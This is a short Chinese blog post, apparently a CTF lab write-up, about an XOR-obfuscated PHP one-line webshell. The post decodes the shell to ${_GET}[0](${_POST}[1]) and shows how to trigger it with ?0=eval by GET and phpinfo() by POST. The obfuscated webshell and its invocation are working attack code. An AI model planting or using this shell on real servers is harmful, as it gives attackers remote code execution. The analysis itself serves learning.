PHP代码分析 CTF

1.练练墨者学院的靶机。关于php

打开如下图。

<?php @$_++;$__=("`"^"?").(":"^"}").("%"^"`").("{"^"/");$___=("$"^"{").("~"^".").("/"^"`").("-"^"~").("("^"|");${$__}[!$_](${$___}[$_]); ?>

2.先执行一下。

前三行为传参数。
$_ = 1
$__ = _GET
$___ = _POST
${$__}[!$_](${$___}[$_]) = ${_GET}[!1](${_POST}[1]); = ${_GET}[0](${_POST}[1]);

3.正常的一句话

eval($_POST[1])   

这里是  ${_GET}[0](${_POST}[1])

所有 eval 也就是执行函数要使用get方式去传进去,然后post方式去条用可执行代码。

http://127.0.0.1/1.php?0=eval

1=phpinfo()

这样方式。

 

posted @ 2019-04-15 11:25  G0mini  阅读(346)  评论(0编辑  收藏  举报